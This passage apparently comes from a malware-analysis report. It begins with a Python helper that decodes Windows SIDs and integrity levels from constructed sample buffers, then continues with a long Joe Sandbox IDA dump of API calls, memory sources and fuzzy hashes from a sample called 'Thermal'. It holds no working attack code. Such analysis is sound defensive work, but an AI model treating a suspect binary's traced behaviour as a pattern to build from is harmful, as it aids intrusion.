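    Layout: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
            SubAuthority[count] (uint32 little-endian each)."""
    revision, count = buf[off], buf[off + 1]
    if revision != 1 or count > 15:
        raise ValueError("not a valid SID")
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_from_mandatory_label(buf: bytes, base: int) -> str:
    """Decode {PSID Sid; DWORD Attributes;} (x86 layout, 8 bytes) followed by
    the SID it points to. `base` is the address the buffer lived at, needed
    to turn the in-buffer pointer back into an offset."""
    sid_ptr, attrs = struct.unpack_from("<II", buf, 0)
    if not attrs & SE_GROUP_INTEGRITY:
        raise ValueError("label lacks SE_GROUP_INTEGRITY")
    sid = parse_sid(buf, sid_ptr - base)
    parts = sid.split("-")
    if int(parts[2]) != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory-label SID: " + sid)
    rid = int(parts[-1])
    # RIDs between the well-known values belong to the next-lower level.
    level = max(k for k in MANDATORY_LABELS if k <= rid)
    return MANDATORY_LABELS[level]


def make_mandatory_label(rid: int, base: int) -> bytes:
    """Constructed test data: the buffer GetTokenInformation would fill if the
    heap allocation landed at `base` (pointer = base + sizeof(struct))."""
    sid = bytes([1, 1]) + (SECURITY_MANDATORY_LABEL_AUTHORITY).to_bytes(6, "big") + struct.pack("<I", rid)
    return struct.pack("<II", base + 8, SE_GROUP_INTEGRITY) + sid


# Constructed sample: a medium-integrity label at a hypothetical heap address.
SAMPLE_BASE = 0x010D1234
SAMPLE_MEDIUM = make_mandatory_label(0x2000, SAMPLE_BASE)

if __name__ == "__main__":
    print(parse_sid(SAMPLE_MEDIUM, 8), integrity_from_mandatory_label(SAMPLE_MEDIUM, SAMPLE_BASE))
```

The LookupPrivilegeValueW followed by _memcmp in the same function is consistent with comparing a looked-up privilege LUID against entries of a token's privilege array, but the report does not show the privilege name or the compared buffer, so that part is not reconstructed here.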
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001A63BD
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A63D7
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A63E5
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001A63F3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: a2591f5173a478c97fe640a4c30d4625afc1d3843c03c141d4fb3821bb6525c3
                                                      • Instruction ID: 827580048d4ec3b6ad10277f6c3d109a612dc580c001b67e93f5bd6fbf7aa2be
                                                      • Opcode Fuzzy Hash: a2591f5173a478c97fe640a4c30d4625afc1d3843c03c141d4fb3821bb6525c3
                                                      • Instruction Fuzzy Hash: 22110335300428AFDB05AB24DC55FBA77A9FF56320F184218F81ACB2D1CB70AC01CB94
                                                      APIs
                                                        • Part of subcall function 0017F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?), ref: 0017F867
                                                        • Part of subcall function 0017F858: lstrcpyW.KERNEL32(00000000,?,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017F88D
                                                        • Part of subcall function 0017F858: lstrcmpiW.KERNEL32(00000000,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?), ref: 0017F8BE
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E488
                                                      • lstrcpyW.KERNEL32(00000000,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E4AE
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E4E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 935715045afa6ce9ffc41586edb2330223db7dacc4cd16d1a61453dba6150fe9
                                                      • Instruction ID: cc4ab02a66d2d292be9c8902cdc080324a0f94bdb9fd0dbe539a4bc7a0738319
                                                      • Opcode Fuzzy Hash: 935715045afa6ce9ffc41586edb2330223db7dacc4cd16d1a61453dba6150fe9
                                                      • Instruction Fuzzy Hash: 1F118E3A200345AFDB25AF34D849D7A77F9FF49350B40816AF90ACB2A0EB71D991C791
                                                      APIs
                                                      • _free.LIBCMT ref: 00155331
                                                        • Part of subcall function 0014593C: __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014593C: __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014593C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: a08b7e29caf8e3c87e348f86c219f7a04e31e2b97c255eb6bebaf11ad985be45
                                                      • Instruction ID: ea165ff1bcd55b36ae5f11ba7b7b407663867275085f71a8ca1c4c57c0e8f0a9
                                                      • Opcode Fuzzy Hash: a08b7e29caf8e3c87e348f86c219f7a04e31e2b97c255eb6bebaf11ad985be45
                                                      • Instruction Fuzzy Hash: D0112B31806A15EFCB653FB0AC5465E37967F243E2B104925FC2C9E1B1DF7089849750
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00184385
                                                      • _memset.LIBCMT ref: 001843A6
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001843F8
                                                      • CloseHandle.KERNEL32(00000000), ref: 00184401
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 5e1be35cbcd40fbcc5805ca95d1ad31fe67421fee1abd0309e44aa36b0786b3b
                                                      • Instruction ID: 9ea39a60a5fe7e1c9808e2b07f4280af08b28cc630c3b553a6e98721e1a966ef
                                                      • Opcode Fuzzy Hash: 5e1be35cbcd40fbcc5805ca95d1ad31fe67421fee1abd0309e44aa36b0786b3b
                                                      • Instruction Fuzzy Hash: 1411A7759012287AD7309BA5AC4DFABBB7CEF45760F10469AF908E7190D7744F808BA4
                                                      APIs
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00187E51,?,?,00000000), ref: 00134041
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00187E51,?,?,00000000,?,?), ref: 00134065
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00196A84
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196A8F
                                                      • _memmove.LIBCMT ref: 00196ABC
                                                      • inet_ntoa.WSOCK32(?), ref: 00196AC7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: e242be07a6bd1f3c50a1dca0151384f361acebb05e5cdc91255e9aa608ef10e5
                                                      • Instruction ID: 5b7cd0e986261d23eaa307796f5a4ebc1e1d335bb8b80bb29647a24517ac9308
                                                      • Opcode Fuzzy Hash: e242be07a6bd1f3c50a1dca0151384f361acebb05e5cdc91255e9aa608ef10e5
                                                      • Instruction Fuzzy Hash: 37116375900108AFCF05EBA4DD46CEEB7B8EF28310B144165F506A72A1DF30AE50DBA1
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 001216B4
                                                      • GetClientRect.USER32(?,?), ref: 0015B93C
                                                      • GetCursorPos.USER32(?), ref: 0015B946
                                                      • ScreenToClient.USER32(?,?), ref: 0015B951
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: a51dd43d68a88b51c2b1b68e48dd230f47e3c7699b7d7b7d365d4be38738ed14
                                                      • Instruction ID: ff2ae1dc9332c85693a6873028335a07ee169e821edf92adc649fb9b85d07319
                                                      • Opcode Fuzzy Hash: a51dd43d68a88b51c2b1b68e48dd230f47e3c7699b7d7b7d365d4be38738ed14
                                                      • Instruction Fuzzy Hash: 69114335A00129FBCB10EF98E889DFE77BAEB28300F000556E901E7540C370BAA1CBA1
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00179719
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0017972B
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00179741
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0017975C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: f3e9f6a434630b31845e84b43d3102bb43402295e3c580182fb8f8878d76d032
                                                      • Instruction ID: a496c7e43ec437f0417c41a46df8c752bb1197a131c8ee01165b228c56c6e837
                                                      • Opcode Fuzzy Hash: f3e9f6a434630b31845e84b43d3102bb43402295e3c580182fb8f8878d76d032
                                                      • Instruction Fuzzy Hash: 2A114879900218FFEB11DF95C985E9DBBB8FB48710F204091E904B7290D7716E10DB90
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                      • GetStockObject.GDI32(00000011), ref: 00122163
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 5a36c025b9d90af1e2888c8954e1cdb905731249dd5399780d1cf6ecd6e1e891
                                                      • Instruction ID: 612223f9c11a20f7fb68f2fa064e1406b31a5e472901ed823416a83746b18ef3
                                                      • Opcode Fuzzy Hash: 5a36c025b9d90af1e2888c8954e1cdb905731249dd5399780d1cf6ecd6e1e891
                                                      • Instruction Fuzzy Hash: B111AD72101259BFEF064F90AC84EEFBB69EF59394F050202FA0456010CB31DCB1DBA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 0018195E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 00181983
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 0018198D
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 001819C0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: 5ff0f9606ecf3e390030923b756c59a37ef805e2df1481777f3d2bd76544b6a6
                                                      • Instruction ID: e30274fb788f5e1801d7c717dabb72c1c4cdf2023c3177b663a7d86944df053f
                                                      • Opcode Fuzzy Hash: 5ff0f9606ecf3e390030923b756c59a37ef805e2df1481777f3d2bd76544b6a6
                                                      • Instruction Fuzzy Hash: FA117C32C0052DEBCF04AFA9D958AEEBB78FF08741F014145E980B2240CB309691CB91
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001AE1EA
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 001AE201
                                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 001AE216
                                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 001AE234
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: c074846fcf9aeb800162707dadaee9fb4827faf4880913a73ed18b778bac7db2
                                                      • Instruction ID: fb69a3f29645751e3b83b87327ebe24e528b0a4e6132c52abcb5371492be1ba4
                                                      • Opcode Fuzzy Hash: c074846fcf9aeb800162707dadaee9fb4827faf4880913a73ed18b778bac7db2
                                                      • Instruction Fuzzy Hash: 75115BB92063049BE7308F51ED09F93BBFCEB05B00F108A5AE61AD6450D7B5E9489BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: 5e2f0c381bbe8803963b08a30538d217c0a5ef3e03d11ce4c56b5727f4c38fd7
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: E6017B3204814AFBCF125E84EC028EE3F22BB29356F488515FE285C571D736C9B9AB91
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 001AB956
                                                      • ScreenToClient.USER32(?,?), ref: 001AB96E
                                                      • ScreenToClient.USER32(?,?), ref: 001AB992
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001AB9AD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: 2848510b0867bf8d5da887960c96ad205ab942a5450ff73128df5e83d8a77c8e
                                                      • Instruction ID: cdcb43cbac38f69127ef4770dabf4ef7da7ce3ba9662cc261ca938d5e4b1f129
                                                      • Opcode Fuzzy Hash: 2848510b0867bf8d5da887960c96ad205ab942a5450ff73128df5e83d8a77c8e
                                                      • Instruction Fuzzy Hash: D11144B9D04249EFDB41CF98C984AEEBBF9FF48310F104156E914E3610D735AA658F50
                                                      APIs
                                                      • _memset.LIBCMT ref: 001ABCB6
                                                      • _memset.LIBCMT ref: 001ABCC5
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E8F20,001E8F64), ref: 001ABCF4
                                                      • CloseHandle.KERNEL32 ref: 001ABD06
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 5704b73d6a32400f620ddd1469761430eb2a98c557f942d19e0a36eabd982705
                                                      • Instruction ID: cced8c618b43a0bd8ebc3a4d8bd9638f447597dee6bb0a37c1c9debcdd481e6d
                                                      • Opcode Fuzzy Hash: 5704b73d6a32400f620ddd1469761430eb2a98c557f942d19e0a36eabd982705
                                                      • Instruction Fuzzy Hash: D7F082B25403947FE75027A5AC49FBF3A5DEB19754F000521BA0CEA5A2DB724C5097B8
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 001871A1
                                                        • Part of subcall function 00187C7F: _memset.LIBCMT ref: 00187CB4
                                                      • _memmove.LIBCMT ref: 001871C4
                                                      • _memset.LIBCMT ref: 001871D1
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 001871E1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: ce97e05ddaa305d05a2045862cf88403f22c7b68e2698d62dc3951727dd75f7e
                                                      • Instruction ID: 0e55ac36cc3a186634339439e446dd3bd09088f7d3dfcf88fc59e6f2b0679a97
                                                      • Opcode Fuzzy Hash: ce97e05ddaa305d05a2045862cf88403f22c7b68e2698d62dc3951727dd75f7e
                                                      • Instruction Fuzzy Hash: 56F05E3A200104ABCF016F55DC89A8ABB29EF59360F08C051FE085F22ACB32E951DBB4
                                                      APIs
                                                        • Part of subcall function 001216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00121729
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121738
                                                        • Part of subcall function 001216CF: BeginPath.GDI32(?), ref: 0012174F
                                                        • Part of subcall function 001216CF: SelectObject.GDI32(?,00000000), ref: 00121778
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001AC3E8
                                                      • LineTo.GDI32(00000000,?,?), ref: 001AC3F5
                                                      • EndPath.GDI32(00000000), ref: 001AC405
                                                      • StrokePath.GDI32(00000000), ref: 001AC413
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: 49acb5fc81d6d2c2e55a78f23bb127b3992cc48af20119690966ca6bec48de79
                                                      • Instruction ID: fca1400e3120abea5ee1daa91bb55350f2455e46988bf9c3cb854f43b7284161
                                                      • Opcode Fuzzy Hash: 49acb5fc81d6d2c2e55a78f23bb127b3992cc48af20119690966ca6bec48de79
                                                      • Instruction Fuzzy Hash: D0F0BE31105258BAEB136F94AC0DFCE3F59AF1A350F048100FA11254E183B455A0DBE9
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0017AA6F
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0017AA82
                                                      • GetCurrentThreadId.KERNEL32 ref: 0017AA89
                                                      • AttachThreadInput.USER32(00000000), ref: 0017AA90
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
